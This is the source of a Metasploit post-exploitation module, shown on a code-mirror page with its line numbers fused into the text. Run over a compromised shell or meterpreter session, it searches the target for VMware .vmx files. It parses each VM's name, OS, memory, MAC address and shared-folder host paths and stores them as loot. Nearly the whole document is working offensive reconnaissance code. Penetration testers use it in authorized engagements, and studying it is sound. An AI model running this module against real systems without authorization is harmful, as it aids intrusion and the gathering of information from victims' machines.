CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/multi/gather/find_vmx.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'yaml'67class MetasploitModule < Msf::Post8include Msf::Post::File910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Multi Gather VMWare VM Identification',15'Description' => %q{16This module will attempt to find any VMWare virtual machines stored on the target.17},18'License' => MSF_LICENSE,19'Author' => ['theLightCosine'],20'Platform' => %w[bsd linux osx unix win],21'SessionTypes' => ['shell', 'meterpreter' ],22'Compat' => {23'Meterpreter' => {24'Commands' => %w[25core_channel_eof26core_channel_open27core_channel_read28core_channel_write29stdapi_fs_search30]31}32}33)34)35end3637def run38if session_has_search_ext39vms = meterp_search40elsif session.platform =~ /unix|linux|bsd|osx/41vms = nix_shell_search42end43report_vms(vms) if vms44end4546def report_vms(vms)47output = "VMWare Virtual Machines\n"48output << "--------------------------------\n"49vms.each do |vm|50next if vm.empty?5152output << "Name: #{vm['name']}\n"53output << "Virtual CPUs: #{vm['cpus']}\n"54output << "Memory: #{vm['memsize']}\n"55output << "Operating System: #{vm['os']}\n"56output << "Network Type: #{vm['eth_type']}\n"57output << "MAC Address: #{vm['mac']}\n"58output << "Shared Folders:\n"59vm['SharedFolders'].each do |folder|60output << "\tHost Location: #{folder}\n"61end62output << "\n"63end64print_good output65store_loot('vmware_vms', 'text/plain', session, output, 'vmware_vms.txt', 'VMWare Virtual Machines')66end6768def nix_shell_search69vms = []70res = session.shell_command('find / -name "*.vmx" -type f -print 2>/dev/null')71res.each_line do |filename|72next unless filename.start_with? '/'7374begin75parse = session.shell_command("cat #{filename}")76vms << parse_vmx(parse, filename)77rescue StandardError78print_error "Could not read #{filename} properly"79end80end81return vms82end8384def meterp_search85vms = []86res = session.fs.file.search(nil, '*.vmx', true, -1)87res.each do |vmx|88filename = "#{vmx['path']}\\#{vmx['name']}"89next if filename.end_with? '.vmxf'9091begin92config = client.fs.file.new(filename, 'r')93parse = config.read94vms << parse_vmx(parse, filename)95rescue StandardError96print_error "Could not read #{filename} properly"97end98end99return vms100end101102def parse_vmx(vmx_data, filename)103vm = {}104unless vmx_data.nil? || vmx_data.empty?105vm['SharedFolders'] = []106vmx_data.each_line do |line|107data = line.split('=')108vm['path'] = filename109case data[0]110when 'memsize '111vm['memsize'] = data[1].gsub!('"', '').lstrip.chomp112when 'displayName '113vm['name'] = data[1].gsub!('"', '').lstrip.chomp114when 'guestOS '115vm['os'] = data[1].gsub!('"', '').lstrip.chomp116when 'ethernet0.connectionType '117vm['eth_type'] = data[1].gsub!('"', '').lstrip.chomp118when 'ethernet0.generatedAddress '119vm['mac'] = data[1].gsub!('"', '').lstrip.chomp120when 'numvcpus '121vm['cpus'] = data[1].gsub!('"', '').lstrip.chomp122when 'sharedFolder0.hostPath '123vm['SharedFolders'] << data[1].gsub!('"', '').lstrip.chomp124end125end126vm['cpus'] ||= '1'127end128return vm129end130131def session_has_search_ext132return !!(session.fs and session.fs.file)133rescue NoMethodError134return false135end136137end138139140